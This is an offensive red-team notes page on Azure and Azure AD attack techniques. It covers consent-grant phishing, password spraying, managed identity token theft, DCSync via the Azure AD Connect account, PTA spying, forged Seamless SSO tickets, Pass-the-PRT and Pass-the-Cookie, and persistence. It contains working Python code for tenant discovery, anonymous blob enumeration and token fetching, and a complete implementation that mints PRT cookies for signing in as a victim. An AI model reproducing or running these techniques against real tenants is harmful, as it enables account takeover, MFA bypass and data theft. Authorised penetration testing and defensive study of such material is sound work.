Tactics, Techniques, and Procedures
Microsoft Azure

Toolset

  • AADInternals

  • Microsoft's own tooling: the MSOnline and AzureAD PowerShell modules (both deprecated in favour of the Microsoft Graph PowerShell SDK, but still what much offensive tooling wraps), the Az PowerShell module, and the Azure CLI (az)

  • Interacting Manually through the Azure Portal

  • PowerZure

  • ROADTools

  • 365-Stealer (initial access via illicit consent grant phishing)

  • TREVORspray (interchangeable with any other password-spraying tool, such as MSOLSpray)

External

  • Azure App Service and Functions apps can run with a managed identity. Code execution or SSRF inside such an app lets you call the local identity endpoint (IDENTITY_ENDPOINT, authenticated with the IDENTITY_HEADER value) and obtain an access token; with it you can enumerate the Azure tenant and, since users and groups are usually synced, learn a great deal about the on-prem AD environment as well.

  • Identify a vulnerability such as SQLi, RCE, or SSRF in a web application to obtain a shell (or at least a request primitive) and enumerate from there.

    • If the attacker lands in a container or VM, check whether the instance metadata service is reachable. On AWS that means IMDS and IAM credentials; on Azure it is the IMDS at http://169.254.169.254/metadata/ (requires the header Metadata: true), which reveals the subscription, resource group and VM details and hands out managed identity tokens.

      • On AWS, AssumeRole is the easy privilege-escalation step, letting the stolen identity impersonate other roles; the Azure analogue is requesting tokens for each resource the managed identity has rights on (ARM, Microsoft Graph, Key Vault) and seeing what they unlock.

  • The tenant can be fingerprinted unauthenticated by querying a user's login realm on a Microsoft endpoint (GetUserRealm). NameSpaceType "Managed" means Azure AD handles the password itself; "Federated" means sign-in is delegated to an on-prem IdP such as ADFS; "Unknown" means the domain is not registered in any tenant.

  • Perform attacks such as password spraying and phishing for easy initial access.

  • 365-Stealer automates an illicit consent grant attack: Azure AD users are sent an OAuth consent link for an attacker-registered multi-tenant application, and once a victim clicks Accept the authorization code is redirected to the attacker's redirect URI and exchanged for the user's access and refresh tokens.

    • This is effective because the link genuinely points at login.microsoftonline.com and the token is delivered to the attacker by the OAuth redirect followed by a POST to the token endpoint, with no further user interaction. It is not an open-redirect bug; it is the normal redirect_uri flow for a registered application.

  • Use MFASweep to check whether MFA or Conditional Access policies actually block a given set of credentials. It tries several endpoints (Microsoft Graph, Azure Service Management, the Microsoft 365 web portal with desktop and mobile user agents, Exchange Web Services, ActiveSync, ADFS), because policies are frequently enforced on some of them and not others.
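The realm lookup described above, as an added example in Python (not code from the page or from any of the tools listed): it derives the tenant from a single e-mail address using two unauthenticated endpoints, GetUserRealm for the Managed/Federated decision and the tenant's OpenID configuration document for the tenant ID. The HTTP layer is injectable, and the sample responses embedded below are constructed (same shape as the live endpoints, made-up values) so the parsers run offline.

```python
"""Azure AD tenant discovery from one e-mail address (added example, standard library only)."""
import json
import re
import urllib.parse
import urllib.request
from typing import Callable, Optional

LOGIN = "https://login.microsoftonline.com"
TENANT_ID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)


def realm_url(upn: str) -> str:
    """GetUserRealm (json=1) answers with NameSpaceType for the UPN's domain, no auth needed."""
    return f"{LOGIN}/getuserrealm.srf?" + urllib.parse.urlencode({"login": upn, "json": "1"})


def openid_config_url(domain: str) -> str:
    """Per-tenant OpenID configuration; any verified domain of the tenant works as the path."""
    return f"{LOGIN}/{domain}/.well-known/openid-configuration"


def parse_realm(body: str) -> dict:
    data = json.loads(body)
    ns = data.get("NameSpaceType", "Unknown")
    info = {"namespace": ns, "domain": data.get("DomainName"), "brand": data.get("FederationBrandName")}
    if ns == "Federated":
        # Password auth for federated domains is delegated to an on-prem IdP (ADFS etc.);
        # sprays and MFA checks need to target that endpoint rather than Azure AD directly.
        info["federation_endpoint"] = data.get("AuthURL")
    return info


def parse_tenant_id(body: str) -> Optional[str]:
    """The tenant GUID is embedded in the issuer and endpoint URLs of the OpenID document."""
    data = json.loads(body)
    for key in ("issuer", "token_endpoint", "authorization_endpoint"):
        m = TENANT_ID_RE.search(data.get(key, ""))
        if m:
            return m.group(0).lower()
    return None


def _http_get(url: str) -> str:
    with urllib.request.urlopen(url, timeout=10) as r:
        return r.read().decode()


def discover(upn: str, fetch: Callable[[str], str] = _http_get) -> dict:
    """Full lookup; pass a different `fetch` to drive it with canned responses."""
    domain = upn.split("@", 1)[1]
    result = parse_realm(fetch(realm_url(upn)))
    if result["namespace"] != "Unknown":
        result["tenant_id"] = parse_tenant_id(fetch(openid_config_url(domain)))
    return result


# Constructed sample responses: same shape as the live endpoints, made-up values.
SAMPLE_REALM_MANAGED = json.dumps({
    "State": 4, "UserState": 1, "Login": "alice@contoso.com", "NameSpaceType": "Managed",
    "DomainName": "contoso.com", "FederationBrandName": "Contoso Ltd",
    "CloudInstanceName": "microsoftonline.com",
})
SAMPLE_REALM_FEDERATED = json.dumps({
    "State": 3, "UserState": 2, "Login": "bob@fabrikam.com", "NameSpaceType": "Federated",
    "DomainName": "fabrikam.com", "FederationBrandName": "Fabrikam",
    "AuthURL": "https://adfs.fabrikam.com/adfs/ls/?username=bob%40fabrikam.com&wa=wsignin1.0",
})
SAMPLE_REALM_UNKNOWN = json.dumps({"State": 4, "UserState": 1, "Login": "x@example.invalid",
                                   "NameSpaceType": "Unknown"})
SAMPLE_OPENID = json.dumps({
    "issuer": "https://sts.windows.net/11111111-2222-3333-4444-555555555555/",
    "token_endpoint": "https://login.microsoftonline.com/11111111-2222-3333-4444-555555555555/oauth2/token",
})


def demo() -> dict:
    """Offline run against the constructed responses."""
    canned = {
        realm_url("alice@contoso.com"): SAMPLE_REALM_MANAGED,
        openid_config_url("contoso.com"): SAMPLE_OPENID,
    }
    return discover("alice@contoso.com", fetch=canned.__getitem__)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))  # live use: discover("someone@target-domain.com")
```

Both endpoints are unauthenticated and generate no sign-in log entries for the target user, which is why this is the first thing to run before any spray: a Federated answer means the spray (and MFASweep) should be pointed at the AuthURL host, not at login.microsoftonline.com.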

Enumerating Blobs

  • Enumerating blobs for a specific tenant from the outside is hard because storage account names are global and not tied to a tenant. BlobHunter (CyberArk) is an authenticated, post-compromise tool: given credentials for a subscription it lists every container with public access in that environment.

  • Without credentials, MicroBurst's Invoke-EnumerateAzureBlobs guesses storage account names built from a keyword such as the client name (plus permutations and suffixes), checks which ones resolve in DNS, and then tries common container names for anonymous listing.
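The unauthenticated approach, as an added example in Python (not code from the page or from MicroBurst): candidate storage account names are derived from a keyword, filtered to the valid DNS-label form, checked in DNS, and each common container name is requested with the container list operation. The suffix and container wordlists are assumptions, and the listing XML below is constructed in the shape the service returns; the DNS and HTTP layers are injectable so the whole flow runs offline.

```python
"""Unauthenticated Azure blob container discovery (added example, standard library only).

Storage account names are globally unique DNS labels: 3-24 chars, lowercase letters and digits.
An account exists if <name>.blob.core.windows.net resolves. A container is anonymously listable if
GET https://<name>.blob.core.windows.net/<container>?restype=container&comp=list returns 200 with an
EnumerationResults document; that needs public access level "Container" ("Blob" level only lets you
fetch blobs whose names you already know).
"""
import re
import socket
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET
from typing import Callable, Tuple

ACCOUNT_RE = re.compile(r"^[a-z0-9]{3,24}$")
# Assumed wordlists; extend with the client's products, regions, environments.
SUFFIXES = ["", "backup", "backups", "data", "dev", "prod", "storage", "files", "logs", "archive"]
CONTAINERS = ["$web", "backup", "backups", "data", "files", "images", "logs", "public", "uploads"]


def candidate_accounts(keyword: str, suffixes=SUFFIXES):
    """Derive plausible storage account names from a keyword, keeping only valid account names."""
    base = re.sub(r"[^a-z0-9]", "", keyword.lower())
    names = []
    for s in suffixes:
        for name in (base + s, s + base):
            if ACCOUNT_RE.match(name) and name not in names:
                names.append(name)
    return names


def list_url(account: str, container: str) -> str:
    return f"https://{account}.blob.core.windows.net/{container}?restype=container&comp=list"


def parse_listing(xml_body: str):
    """Blob names from a container list response (no XML namespace on this API)."""
    root = ET.fromstring(xml_body)
    return [b.findtext("Name") for b in root.iter("Blob")]


def account_exists(account: str) -> bool:
    try:
        socket.gethostbyname(f"{account}.blob.core.windows.net")
        return True
    except socket.gaierror:
        return False


def _http_get(url: str) -> Tuple[int, str]:
    try:
        with urllib.request.urlopen(url, timeout=10) as r:
            return r.status, r.read().decode()
    except urllib.error.HTTPError as e:
        return e.code, ""


def enumerate_public(keyword: str,
                     fetch: Callable[[str], Tuple[int, str]] = _http_get,
                     resolve: Callable[[str], bool] = account_exists):
    """Returns {account: {container: [blob names]}} for containers that list anonymously."""
    found = {}
    for account in candidate_accounts(keyword):
        if not resolve(account):
            continue
        for container in CONTAINERS:
            status, body = fetch(list_url(account, container))
            if status == 200 and "<EnumerationResults" in body:
                found.setdefault(account, {})[container] = parse_listing(body)
    return found


# Constructed sample response in the shape the service returns for a listable container.
SAMPLE_LISTING = """<EnumerationResults ServiceEndpoint="https://contosobackup.blob.core.windows.net/" ContainerName="backups">
  <Blobs>
    <Blob><Name>sql/prod-2023-11-01.bak</Name><Properties><Content-Length>1048576</Content-Length></Properties></Blob>
    <Blob><Name>web.config</Name><Properties><Content-Length>2048</Content-Length></Properties></Blob>
  </Blobs>
  <NextMarker />
</EnumerationResults>"""


def demo():
    """Offline run: only contosobackup 'resolves', only its backups container lists."""
    canned = {list_url("contosobackup", "backups"): (200, SAMPLE_LISTING)}
    return enumerate_public("Contoso",
                            fetch=lambda u: canned.get(u, (404, "")),
                            resolve=lambda a: a == "contosobackup")


if __name__ == "__main__":
    print(demo())  # live use: enumerate_public("clientname")
```

A 404 with the error code ContainerNotFound versus PublicAccessNotPermitted is itself informative (the first says the container name is wrong, the second that it exists but is private); the example keys only on 200 to keep the logic short.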

Internal

MISC

  • Windows VMs deployed from Azure marketplace images ship with the .NET Framework (4.x) installed, so .NET tooling and MSBuild payloads run without extra dependencies.

  • Service principals in Azure AD are the identities of applications (and of managed identities). They authenticate with a client secret or certificate rather than a password and are not interactive users.

Authentication Types

  • Most likely Password Hash Synchronization (PHS) is in use: Azure AD Connect replicates on-prem password hashes (in a re-hashed form) to the cloud, pulling them over the same Directory Replication Service interface a domain controller would use.

    • The on-prem account doing that replication, MSOL_<installation id>, holds "Replicating Directory Changes" and "Replicating Directory Changes All" on the domain, so whoever holds its password can DCSync EVERY domain user's hash.

      • It is easy to find with an LDAP query because it keeps its default description, which starts with "Account created by Microsoft Azure Active Directory Connect with installation identifier" (for example the filter (&(objectCategory=user)(description=Account created by Microsoft Azure Active Directory Connect*))).

    • Its password is stored, encrypted, in the ADSync database on the Azure AD Connect server. With local admin there, adconnectdump (ADSyncDecrypt / ADSyncGather / ADSyncQuery) or AADInternals' Get-AADIntSyncCredentials recovers it, and adconnectdump can also perform the extraction over the network. The companion cloud account Sync_<server>_<id>@<tenant>.onmicrosoft.com comes out too; it holds the Directory Synchronization Accounts role and can set cloud passwords.

  • Pass-through Authentication (PTA) gives users a single password for Azure AD and on-prem without sending hashes to the cloud.

    • When a user signs into, say, Outlook on the web, Azure AD encrypts the submitted password with the on-prem PTA agent's public key, the agent pulls it from a queue, decrypts it and validates it against a domain controller.

    • An attacker who controls the PTA agent server can therefore inject into the agent process, log every cleartext password it validates and make it accept any password for any user; AADInternals' Install-AADIntPTASpy does exactly this.

  • If Seamless Single Sign-On is enabled, on-prem AD contains a computer account AZUREADSSOACC whose Kerberos key (obtainable via DCSync) is what Azure AD trusts. With that key an attacker can forge a Silver Ticket for HTTP/autologon.microsoftazuread-sso.com as any synced user and inject it into the current session to obtain a cloud session as that user. This only works where no MFA or Conditional Access policy demands a second factor.

  • AADInternals (https://github.com/Gerenios/AADInternals) provides most of the Azure AD attack cmdlets referenced on this page.

  • Azure PowerShell (https://learn.microsoft.com/en-us/powershell/module/az.resources/?view=azps-9.1.0)

    • Several interesting cmdlets: add API permissions, groups and users; enumerate resources, role assignments and policies; and so on.

  • dsregcmd /status shows whether a machine is Azure AD joined (AzureAdJoined : YES in the Device State section) and whether the current user holds a PRT (AzureAdPrt : YES in the SSO State section).

  • The Az PowerShell module and the Azure CLI cache sessions under %USERPROFILE%\.Azure (for example C:\Users\Parzival\.Azure): AzureRmContext.json lists the tenants and subscriptions that have been used, and the token cache (TokenCache.dat for Az, msal_token_cache.* for the CLI) holds refresh tokens. Older versions wrote these in cleartext; current versions protect the Windows cache with DPAPI, which any process running as that user can still unprotect. If the user has not signed out, an attacker can reuse the cached token as that user.
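Whichever way a token is obtained, from a managed identity endpoint as in the External section or from a cached session as above, the first question is what it is good for. As an added example in Python (not code from the page or from any listed tool), the block below builds the token request for the two managed identity endpoints and decodes a token's claims without verifying the signature, which is fine for triage since nothing is being authorised on the basis of those claims. The sample token is constructed with a placeholder signature.

```python
"""Azure access token triage (added example, standard library only).

Token sources:
  * Azure IMDS (VMs, and containers that can reach 169.254.169.254): header Metadata: true
  * App Service / Functions: IDENTITY_ENDPOINT and IDENTITY_HEADER environment variables
"""
import base64
import json
import os
import time
import urllib.parse
import urllib.request

ARM = "https://management.azure.com/"
GRAPH = "https://graph.microsoft.com/"


def managed_identity_request(resource: str = ARM, env=os.environ) -> urllib.request.Request:
    """Token request for whichever managed identity endpoint the host exposes."""
    if "IDENTITY_ENDPOINT" in env:  # App Service / Functions / Container Apps
        url = env["IDENTITY_ENDPOINT"] + "?" + urllib.parse.urlencode(
            {"resource": resource, "api-version": "2019-08-01"})
        return urllib.request.Request(url, headers={"X-IDENTITY-HEADER": env["IDENTITY_HEADER"]})
    url = "http://169.254.169.254/metadata/identity/oauth2/token?" + urllib.parse.urlencode(
        {"resource": resource, "api-version": "2018-02-01"})
    return urllib.request.Request(url, headers={"Metadata": "true"})


def fetch_token(resource: str = ARM) -> str:
    """Live call; only works on an Azure host with a managed identity."""
    with urllib.request.urlopen(managed_identity_request(resource), timeout=5) as r:
        return json.loads(r.read())["access_token"]


def _b64url_decode(part: str) -> bytes:
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))


def decode_claims(token: str) -> dict:
    """Read the payload only; the signature is NOT checked (triage, not authorisation)."""
    _header, payload, _sig = token.split(".")
    return json.loads(_b64url_decode(payload))


def triage(token: str, now=None) -> dict:
    c = decode_claims(token)
    now = time.time() if now is None else now
    return {
        "tenant_id": c.get("tid"),
        "audience": c.get("aud"),            # which API the token is for (ARM, Graph, Key Vault ...)
        # app-only tokens (managed identities, service principals) carry appid but no upn
        "identity_type": "application" if "appid" in c and "upn" not in c else "user",
        "object_id": c.get("oid"),
        "principal": c.get("upn") or c.get("appid"),
        "app_roles": c.get("roles", []),     # application permissions granted to an app
        "delegated_scopes": c.get("scp", "").split() if c.get("scp") else [],
        "expired": c.get("exp", 0) < now,
        "seconds_left": int(c.get("exp", 0) - now),
    }


def make_sample_token(claims: dict) -> str:
    """Constructed, unsigned token for offline testing (signature is a placeholder)."""
    def enc(d):
        return base64.urlsafe_b64encode(json.dumps(d).encode()).rstrip(b"=").decode()
    return ".".join([enc({"typ": "JWT", "alg": "RS256", "kid": "fake"}), enc(claims), "sig"])


# Constructed managed-identity style token: made-up GUIDs, fixed timestamps.
SAMPLE_MI_TOKEN = make_sample_token({
    "aud": ARM, "iss": "https://sts.windows.net/11111111-2222-3333-4444-555555555555/",
    "tid": "11111111-2222-3333-4444-555555555555",
    "appid": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", "oid": "99999999-8888-7777-6666-555555555555",
    "idtyp": "app", "iat": 1700000000, "nbf": 1700000000, "exp": 1700003600,
})

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_MI_TOKEN, now=1700000100), indent=2))
    # on an Azure host: print(json.dumps(triage(fetch_token(GRAPH)), indent=2))
```

A token whose audience is ARM says nothing about Graph access; request one per resource and triage each, because the managed identity's role assignments and API permissions are granted separately.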

Signing into Azure

  • After importing PowerZure, sign in either interactively (a login window is spawned, MFA prompts included) or by reusing a cached context/token from the user's .Azure folder.

  • If MFA is not enforced for the account, credentials can be passed non-interactively, e.g. Connect-AzAccount -Credential (Get-Credential) or az login -u <user> -p <password>.

Role Abuse

  • READER - Read-only, but read access is often enough: it can pull Automation runbook source to look for hard-coded credentials, read resource configuration, and generally map the subscription.

  • CONTRIBUTOR - Can modify resources in Azure, which means potential command execution: run commands on VMs (Run Command or a custom script extension), drop an MSBuild payload, or deploy an arbitrary binary.

    • Contributors can also read Key Vault contents (secrets, keys, certificates) wherever the vault's access policy allows it (and under the access-policy permission model a contributor can grant themselves one), along with application secrets and Automation account Run As credentials.

    • Contributors can also snapshot and download VM disks, which can yield a significant amount of information (SAM/NTDS, configuration files, private keys).

  • OWNER - Can do everything a contributor can, and can additionally grant permissions on the resources they own, which provides a backdoor opportunity.

  • ADMINISTRATOR - User Access Administrator at the subscription level and Global Administrator in Azure AD can assign roles and create backdoors. A typical chain is to create an Automation runbook that creates a new user, assigns it the Owner role, and exposes the runbook through a webhook the attacker can trigger at will.

PRT (Primary Refresh Token)

  • Used to provide an SSO experience so that a user can access Teams, Exchange Online, and Azure AD-integrated web apps without re-authenticating.

  • When a user signs into a website from a browser that supports Azure AD SSO, the Cloud Authentication Provider (CloudAP, inside LSASS) mints a PRT cookie (x-ms-RefreshTokenCredential) for the user, which the browser sends to login.microsoftonline.com.

  • As an attacker, if we can compromise a user's PRT and session key, we can mint PRT cookies at will and access web resources as that user from any device; because the PRT already carries the device and MFA claims, Conditional Access policies that require them are satisfied too.

Pass the PRT

  1. Extract the PRT from LSASS with Mimikatz sekurlsa::cloudap. The session key is dumped alongside it, but still in encrypted form.

  2. Extract the session key. Remember that it is issued by Azure AD and then re-encrypted by the local device, so it must be decrypted with a DPAPI master key (Mimikatz dpapi::cloudapkd /keyvalue:<encrypted key> /unprotect, the same approach used for other DPAPI-protected blobs).

  3. Using the decrypted session key, derive the signing key for the PRT together with a random context value. These are what is needed to create the PRT cookie: the derived key signs the JWT that forms the cookie, and the context is carried in the JWT header so Azure AD can derive the same key (Mimikatz prints the derived key and context; ROADtools' roadtx or AADInternals' New-AADIntUserPRTToken can then build the cookie).
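The cookie-minting step carried through, as an added example in Python (not code from the page, Mimikatz or ROADtools): the signing key is the SP800-108 counter-mode HMAC-SHA256 KDF of the session key with label AzureAD-SecureConversation and a random 24-byte context, the cookie is an HS256 JWT over the PRT and a server nonce, and the verifier recomputes the key from the context in the header, which is exactly what Azure AD does. The PRT, session key and nonce below are constructed placeholders, not real material.

```python
"""Mint an Azure AD PRT cookie (x-ms-RefreshTokenCredential) from a PRT + session key.

Added example, standard library only. Inputs are the two values the Mimikatz steps yield:
  * prt         - the opaque Primary Refresh Token string
  * session_key - 32 raw bytes, after DPAPI decryption
Cookie layout (original KDF scheme, the one Mimikatz's output corresponds to):
  header  : {"alg": "HS256", "ctx": base64(24 random bytes)}
  payload : {"refresh_token": prt, "is_primary": "true", "request_nonce": nonce}
  HMAC key: SP800-108 counter-mode KDF (HMAC-SHA256) of session_key, label
            "AzureAD-SecureConversation", context = the same 24 bytes as ctx
The nonce comes from POST grant_type=srv_challenge to
https://login.microsoftonline.com/common/oauth2/token (not done here: offline example).
"""
import base64
import hashlib
import hmac
import json
import os
import struct
from typing import Optional

LABEL = b"AzureAD-SecureConversation"


def derive_key(session_key: bytes, context: bytes) -> bytes:
    """SP800-108 counter mode, one 256-bit block: HMAC(K, [i=1]_4 || Label || 0x00 || Context || [L=256]_4)."""
    fixed = LABEL + b"\x00" + context + struct.pack(">I", 256)
    return hmac.new(session_key, struct.pack(">I", 1) + fixed, hashlib.sha256).digest()


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def mint_prt_cookie(prt: str, session_key: bytes, nonce: str, context: Optional[bytes] = None) -> str:
    if context is None:
        context = os.urandom(24)
    header = {"alg": "HS256", "ctx": base64.b64encode(context).decode()}
    payload = {"refresh_token": prt, "is_primary": "true", "request_nonce": nonce}
    signing_input = (_b64url(json.dumps(header, separators=(",", ":")).encode()) + "." +
                     _b64url(json.dumps(payload, separators=(",", ":")).encode()))
    sig = hmac.new(derive_key(session_key, context), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def verify_prt_cookie(cookie: str, session_key: bytes) -> Optional[dict]:
    """What the IdP does: read ctx from the header, re-derive the key, check the HMAC."""
    try:
        h, p, s = cookie.split(".")
        context = base64.b64decode(json.loads(_b64url_decode(h))["ctx"])
        expected = hmac.new(derive_key(session_key, context), f"{h}.{p}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(s)):
            return None
        return json.loads(_b64url_decode(p))
    except (ValueError, KeyError):
        return None


# Constructed sample material (not a real PRT, key or nonce).
SAMPLE_SESSION_KEY = bytes(range(32))
SAMPLE_PRT = "0.AXYA" + "A" * 40 + ".constructed-prt"
SAMPLE_NONCE = "AwABAAEAAAACAOz_BAD0_constructed_nonce"


def demo() -> str:
    """Deterministic run with an all-zero context so the output is reproducible."""
    cookie = mint_prt_cookie(SAMPLE_PRT, SAMPLE_SESSION_KEY, SAMPLE_NONCE, context=bytes(24))
    # Use: in a fresh browser profile set cookie x-ms-RefreshTokenCredential=<cookie> for
    # login.microsoftonline.com, then open https://portal.azure.com; sign-in completes as the victim.
    return cookie


if __name__ == "__main__":
    print(demo())
```

Because the nonce is bound into the signed payload, a cookie is single-use and short-lived; mint a fresh one per sign-in rather than trying to replay a captured cookie.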

Pass the Cookie

  1. Extract browser cookies from the user, e.g. with Mimikatz dpapi::chrome against the Chrome/Edge cookie database (the cookies are encrypted under a key that the user's DPAPI master key unlocks).

    1. The ones we care about are the Azure AD session cookies for login.microsoftonline.com: ESTSAUTH, ESTSAUTHPERSISTENT, and ESTSAUTHLIGHT.

  2. Now that we have the cookies, import them into another browser session (a cookie editor extension is enough) for login.microsoftonline.com and browse to a Microsoft 365 or Azure portal: the session resumes as the victim, and because MFA was already satisfied when the cookie was issued, MFA is bypassed.

  3. No privileged access to the workstation is needed for this attack, because every user can read and decrypt their own browser cookies; running as the victim is sufficient.

Post Exploitation

  • If you have compromised a Global Administrator or Intune Administrator you can run arbitrary scripts on managed endpoints: Intune pushes PowerShell scripts to Azure AD joined, Intune-enrolled devices (they execute as SYSTEM by default), and Azure Automation runbooks (PowerShell or Python) run on any on-prem machine registered as a Hybrid Runbook Worker.

    • This lets an attacker pivot from the cloud to on-prem, or deploy persistence or ransomware across many machines at once.

Persistence

  • If a tenant has been compromised, an attacker can modify Conditional Access policies, for instance excluding specific users or a named location so they can connect without MFA or device restrictions. This is recorded in the Azure AD audit log, though.

  • Assign credentials to service principals. By default any Azure AD user can create and register applications (unless "Users can register applications" has been turned off) and becomes owner of the resulting application and service principal.

    • Granting high-privilege API permissions to an application still requires admin consent.

  • Once a Global Administrator or Application Administrator has been compromised, you can add permissions and credentials to any application via the Azure portal (or Microsoft Graph). A secret or certificate attached to the service principal gives a long-lived login as that application; service principal sign-ins are not subject to user MFA or user-scoped Conditional Access policies, so this survives password resets and MFA enforcement aimed at human accounts.

Last updated 1 year ago
